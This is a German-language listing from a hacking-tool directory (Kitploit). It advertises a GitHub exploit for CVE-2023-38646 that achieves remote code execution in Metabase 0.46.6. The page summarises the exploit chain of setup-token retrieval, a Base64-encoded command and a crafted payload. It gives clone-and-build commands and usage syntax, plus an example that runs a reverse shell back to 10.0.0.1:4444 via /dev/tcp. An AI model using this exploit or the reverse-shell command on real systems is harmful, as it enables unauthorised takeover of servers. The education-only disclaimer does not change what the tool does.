Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — Exploit für CVE-2023-38646 in Metabase 0.46.6, der Remote-Codeausführung über manipulierte Anfragen und den Abruf von Setup-Tokens ermöglicht. | Kitploit
Tools/GitHubGitHub/danithehack3r/cve-2023-38646
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Trojaner
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Exploit für CVE-2023-38646 in Metabase 0.46.6, der Remote-Codeausführung über manipulierte Anfragen und den Abruf von Setup-Tokens ermöglicht.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38646

CVE-2023-38646 Metabase 0.46.6 Exploit

Dieses Tool nutzt eine Schwachstelle (CVE-2023-38646) in einer Softwareplattform aus. Der Exploit ermöglicht die Remote-Codeausführung über eine manipulierte Anfrage, indem eine fehlerhaft verarbeitete Datenbank-Verbindungszeichenfolge ausgenutzt wird.

Übersicht

Das Tool:

  • Ruft das Setup-Token von der Ziel-URL ab.
  • Kodiert den übergebenen Befehl mit Base64.
  • Erstellt das Payload mit dem kodierten Befehl.
  • Sendet das Payload, um die Schwachstelle auszunutzen.

Installation

Repository klonen:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Verwendung

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: Die URL der Plattform, die gescannt und ausgenutzt werden soll. COMMAND: Der Befehl, der auf dem Ziel ausgeführt werden soll. PROXY_URL (Optional): Die URL des Proxy-Servers (z. B. http://127.0.0.1:8080). Wenn nicht angegeben, wird kein Proxy verwendet.

Beispiel mit einer sh-Reverse-Shell

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungs- und Forschungszwecke gedacht. Stellen Sie stets sicher, dass Sie über die entsprechende Autorisierung verfügen, bevor Sie ein Ziel scannen oder ausnutzen. Die missbräuchliche Verwendung dieses Tools widerspricht ausdrücklich der Absicht des Entwicklers und könnte illegal sein.

Feedback & Beiträge

Zögern Sie nicht, Issues für Feedback, Fehler oder Feature-Anfragen zu eröffnen. Pull Requests sind jederzeit willkommen!

Tool herunterladen